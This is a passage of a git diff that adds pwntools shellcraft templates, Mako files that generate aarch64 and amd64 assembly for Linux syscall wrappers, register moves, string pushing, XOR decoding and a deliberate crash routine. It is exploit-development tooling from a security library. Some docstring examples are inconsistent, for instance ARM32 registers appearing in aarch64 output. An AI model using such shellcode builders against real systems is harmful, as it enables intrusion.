shellcraft.aarch64.linux.syscall(11, 1, 'sp', 2, 0).rstrip() + /* call syscall(11, 1, 'sp', 2, 0) */ + mov r0, #1 + mov r1, sp + mov r2, #2 + eor r3, r3 /* 0 (#0) */ + mov r7, #0xb + svc 0 + >>> print shellcraft.aarch64.linux.syscall('SYS_exit', 0).rstrip() + /* call exit(0) */ + eor r0, r0 /* 0 (#0) */ + mov r7, #(SYS_exit) /* 1 */ + svc 0 + +<% + if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): + syscall_repr = syscall[4:] + "(%s)" + args = [] + else: + syscall_repr = 'syscall(%s)' + if syscall == None: + args = ['?'] + else: + args = [repr(syscall)] + + for arg in [arg0, arg1, arg2, arg3, arg4, arg5]: + if arg == None: + args.append('?') + else: + args.append(repr(arg)) + while args and args[-1] == '?': + args.pop() + syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) +%>\ + /* call ${syscall_repr} */ +%if any(arguments): + ${aarch64.setregs(regctx)} +%endif + svc 0 diff --git a/pwnlib/shellcraft/templates/aarch64/linux/syslog.asm b/pwnlib/shellcraft/templates/aarch64/linux/syslog.asm new file mode 100644 index 000000000..a1fdf027c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/tee.asm b/pwnlib/shellcraft/templates/aarch64/linux/tee.asm new file mode 100644 index 000000000..2dbfbbad6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/time.asm b/pwnlib/shellcraft/templates/aarch64/linux/time.asm new file mode 100644 index 000000000..578e8ff59 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm new file mode 100644 index 000000000..8ab473e1a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm new file mode 100644 index 000000000..47a710750 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm new file mode 100644 index 000000000..385aa985a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm new file mode 100644 index 000000000..293ba99e3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm new file mode 100644 index 000000000..a48042555 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/truncate.asm b/pwnlib/shellcraft/templates/aarch64/linux/truncate.asm new file mode 100644 index 000000000..0587ef2b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm b/pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm new file mode 100644 index 000000000..64ef0b6d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm b/pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm new file mode 100644 index 000000000..065729880 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/umask.asm b/pwnlib/shellcraft/templates/aarch64/linux/umask.asm new file mode 100644 index 000000000..038ef2086 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/uname.asm b/pwnlib/shellcraft/templates/aarch64/linux/uname.asm new file mode 100644 index 000000000..bcff7dc9f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/unlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/unlink.asm new file mode 100644 index 000000000..4f0a06ccc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm new file mode 100644 index 000000000..f0cce2f89 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/unshare.asm b/pwnlib/shellcraft/templates/aarch64/linux/unshare.asm new file mode 100644 index 000000000..90bbd4cad --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ustat.asm b/pwnlib/shellcraft/templates/aarch64/linux/ustat.asm new file mode 100644 index 000000000..a131b5cd0 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/utime.asm b/pwnlib/shellcraft/templates/aarch64/linux/utime.asm new file mode 100644 index 000000000..d9ff57bee --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm b/pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm new file mode 100644 index 000000000..97de6323a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/utimes.asm b/pwnlib/shellcraft/templates/aarch64/linux/utimes.asm new file mode 100644 index 000000000..831e694f8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/vfork.asm b/pwnlib/shellcraft/templates/aarch64/linux/vfork.asm new file mode 100644 index 000000000..dd43c49a0 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm b/pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm new file mode 100644 index 000000000..6ff5d6f24 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm b/pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm new file mode 100644 index 000000000..e6e586485 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/wait4.asm b/pwnlib/shellcraft/templates/aarch64/linux/wait4.asm new file mode 100644 index 000000000..f14bc1057 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/waitid.asm b/pwnlib/shellcraft/templates/aarch64/linux/waitid.asm new file mode 100644 index 000000000..2f0cb7384 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm b/pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm new file mode 100644 index 000000000..18113decb --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/write.asm b/pwnlib/shellcraft/templates/aarch64/linux/write.asm new file mode 100644 index 000000000..e23d9c696 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/writev.asm b/pwnlib/shellcraft/templates/aarch64/linux/writev.asm new file mode 100644 index 000000000..83078344f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/mov.asm b/pwnlib/shellcraft/templates/aarch64/mov.asm new file mode 100644 index 000000000..0b7fbbb1f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/mov.asm @@ -0,0 +1,108 @@ +<% + from pwnlib.shellcraft import common, aarch64 + from pwnlib import constants + from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.log import getLogger + from pwnlib.util.lists import group + from pwnlib.util.packing import p16, u16, pack, unpack + from pwnlib.util.fiddling import xor_pair + from pwnlib.shellcraft.registers import aarch64 as regs + log = getLogger('pwnlib.shellcraft.arm.mov') +%> +<%page args="dst, src"/> +<%docstring> +Move src into dest. + +Support for automatically avoiding newline and null bytes has to be done. + +If src is a string that is not a register, then it will locally set +`context.arch` to `'arm'` and use :func:`pwnlib.constants.eval` to evaluate the +string. Note that this means that this shellcode can change behavior depending +on the value of `context.os`. + +Examples: + + >>> print shellcraft.aarch64.mov('x0','x1').rstrip() + mov x0, x1 + >>> print shellcraft.aarch64.mov('x0','x0').rstrip() + mov x0, xzr + >>> print shellcraft.aarch64.mov('x0', 5).rstrip() + /* Set x0 = 5 = 0x5 */ + mov x0, #5 + >>> print shellcraft.aarch64.mov('x0', 0x34532).rstrip() + /* Set x0 = 214322 = 0x34532 */ + mov x0, #17714 + movk x0, #3, lsl #16 + +Args: + dest (str): The destination register. + src (str): Either the input register, or an immediate value. + +<% +if dst not in regs: + log.error('%r is not a register' % str(dst)) + +if not src in regs: + with ctx.local(arch = 'aarch64'): + src = constants.eval(src) + +mov_x0_x15 = False +xor = None + +# if isinstance(src, (int, long)): +# # Moving an immediate into x0 emits a null byte. +# # Moving a register into x0 does not. +# # Use x15 as a scratch register. +# if dst == 'x0': +# mov_x0_x15 = True +# dst = 'x15' +# +# packed = pack(src) +# words = group(2, packed) +# xor = ['\x00\x00'] * 4 +# okay = False +# +# for i, word in enumerate(list(words)): +# # If an entire word is zero, we can work around it. +# # However, if any of the individual bytes are '\n', or only +# # one of the bytes is a zero, we must do an XOR. +# if '\n' not in word or word == '\x00\x00' or '\x00' not in word: +# continue +# +# a, b = xor_pair(word) +# words[i] = a +# xor[i] = b +# +# src = unpack(''.join(words)) +# xor = unpack(''.join(xor)) + +%> +%if not isinstance(src, (int, long)): + mov ${dst}, ${src} +%else: + /* Set ${dst} = ${src} = 0x${'%x' % src} */ + %if src == 0: + mov ${dst}, xzr + %elif src & 0xffff == 0: + eor ${dst}, ${dst}, ${dst} + %endif + %if src & 0x000000000000ffff: + mov ${dst}, #${(src >> 0x00) & 0xffff} + %endif + %if src & 0x00000000ffff0000: + movk ${dst}, #${(src >> 0x10) & 0xffff}, lsl #16 + %endif + %if src & 0x0000ffff00000000: + movk ${dst}, #${(src >> 0x20) & 0xffff}, lsl #0x20 + %endif + %if src & 0xffff000000000000: + movk ${dst}, #${(src >> 0x30) & 0xffff}, lsl #0x30 + %endif + %if xor: + ${aarch64.mov('x14', xor)} + eor ${dst}, ${dst}, x14 + %endif + %if mov_x0_x15: + ${aarch64.mov('x0','x15')} + %endif +%endif diff --git a/pwnlib/shellcraft/templates/aarch64/pushstr.asm b/pwnlib/shellcraft/templates/aarch64/pushstr.asm new file mode 100644 index 000000000..20ed6ac0d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/pushstr.asm @@ -0,0 +1,54 @@ +<% from pwnlib.util import lists, packing, fiddling %> +<% from pwnlib.shellcraft.aarch64 import mov %> +<%page args="string, append_null = True, register='r12'"/> +<%docstring> +Pushes a string onto the stack. + +r12 is defined as the inter-procedural scratch register ($ip), +so this should not interfere with most usage. + +Args: + string (str): The string to push. + append_null (bool): Whether to append a single NULL-byte before pushing. + register (str): Temporary register to use. By default, R7 is used. + +Examples: + + >>> print shellcraft.aarch64.pushstr("Hello!").rstrip() + /* push 'Hello!\x00\x00' */ + sub sp, sp, #16 + /* Set x0 = 36762444129608 = 0x216f6c6c6548 */ + mov x0, #25928 + movk x0, #27756, lsl #16 + movk x0, #8559, lsl #0x20 + stur x0, [sp, #16 * 0] + + +<% +if append_null: + string += '\x00' + +while len(string) % 8: + string += '\x00' + +# Unpack everything into integers, and group them by twos +# so we may use STP to store multiple in a single instruction +words = packing.unpack_many(string) +pairs = lists.group(2, words) + +# The stack must be 16-byte aligned +total = len(pairs) * 16 + +offset = 0 +%>\ + /* push ${repr(string)} */ + sub sp, sp, #${total} +%for i,pair in enumerate(pairs): + ${mov('x0', pair[0])} + %if len(pair) == 1: + stur x0, [sp, #16 * ${i}] + %else: + ${mov('x1', pair[1])} + stp x0, x1, [sp, #16 * ${i}] + %endif +%endfor diff --git a/pwnlib/shellcraft/templates/aarch64/setregs.asm b/pwnlib/shellcraft/templates/aarch64/setregs.asm new file mode 100644 index 000000000..8edb912be --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/setregs.asm @@ -0,0 +1,43 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.aarch64 import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'x0':1, 'x2':'x3'}).rstrip() + mov x0, #1 + mov x2, x3 + >>> print shellcraft.setregs({'x0':'x1', 'x1':'x0', 'x2':'x3'}).rstrip() + mov x2, x3 + eor x0, x0, x1 /* xchg r0, r1 */ + eor x1, x0, x1 + eor x0, x0, x1 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.aarch64) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, dst, src in regsort(reg_context, registers.aarch64): +% if how == 'xchg': + eor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + eor ${src}, ${dst}, ${src} + eor ${dst}, ${dst}, ${src} +% else: + ${mov(dst, src)} +% endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/aarch64/xor.asm b/pwnlib/shellcraft/templates/aarch64/xor.asm new file mode 100644 index 000000000..3fbd2dfe8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/xor.asm @@ -0,0 +1,67 @@ +<% + from pwnlib.shellcraft import pretty, common, aarch64, registers + from pwnlib.shellcraft.registers import aarch64 as regs + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 4-byte integer, + If a string, length must be a power of two, + and not longer than 4 bytes. + address (int): Address of the data (e.g. 0xdead0000, 'rsp') + count (int): Number of bytes to XOR. + +<% +log = getLogger('pwnlib.shellcraft.templates.aarch64.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +if not key in regs: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'x0': count, 'x1': address} +if key in regs: + regctx['x2'] = key + key_pretty = 'x2' +%> + /* xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${aarch64.setregs(regctx)} + add x0, x0, x1 +${start}: + ldr x3, [x1] + eor x3, x3, x2 + str x3, [x1] + add x1, x1, ${key_size} + cmp x1, x0 + blt ${start} diff --git a/pwnlib/shellcraft/templates/amd64/crash.asm b/pwnlib/shellcraft/templates/amd64/crash.asm new file mode 100644 index 000000000..69d1b7ecf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/crash.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft.amd64 import popad %> +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) + -11 + + /* fill all registers with shit */ + ${popad()} + xor rsp, rsp /* especially esp */ + jmp rsp /* boom */ diff --git a/pwnlib/shellcraft/templates/amd64/itoa.asm b/pwnlib/shellcraft/templates/amd64/itoa.asm new file mode 100644 index 000000000..c61a33615 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/itoa.asm @@ -0,0 +1,60 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.amd64 import mov, pushstr +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.amd64.mov('rax', 0xdeadbeef) + >>> sc += shellcraft.amd64.itoa('rax') + >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='rsp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') +assert v in registers.amd64 +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='rsp': + sub rsp, 0x10 +%endif +## We need to know how long the string is, in order for +## the beginning of the string to be *exactly* at rsp. + ${mov('rdi', buffer)} + ${mov('rax', v)} + push rax /* save for later */ +${size_loop}: + ${mov('rdx', 0)} + ${mov('rcx', 10)} + div rcx + inc rdi + test rax, rax + jnz ${size_loop} + dec rdi +## Now we begin the actual division process + pop rax + ${itoa_loop}: + ${mov('rdx', 0)} +## rcx is already 10 + div rcx + add dl, ${ord('0')} + mov BYTE PTR [rdi], dl + dec rdi + test rax, rax + jnz ${itoa_loop} +## null terminate + ${mov('rdx', 0)} + mov BYTE PTR [rdi], dl + inc rdi diff --git a/pwnlib/shellcraft/templates/amd64/linux/accept.asm b/pwnlib/shellcraft/templates/amd64/linux/accept.asm new file mode 100644 index 000000000..5fe60c09b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/access.asm b/pwnlib/shellcraft/templates/amd64/linux/access.asm new file mode 100644 index 000000000..d55019a93 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/acct.asm b/pwnlib/shellcraft/templates/amd64/linux/acct.asm new file mode 100644 index 000000000..dbe8800e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/alarm.asm b/pwnlib/shellcraft/templates/amd64/linux/alarm.asm new file mode 100644 index 000000000..f38efa55f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/bind.asm b/pwnlib/shellcraft/templates/amd64/linux/bind.asm new file mode 100644 index 000000000..d7e090938 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/brk.asm b/pwnlib/shellcraft/templates/amd64/linux/brk.asm new file mode 100644 index 000000000..bf88acb97 --- /dev/null +++ 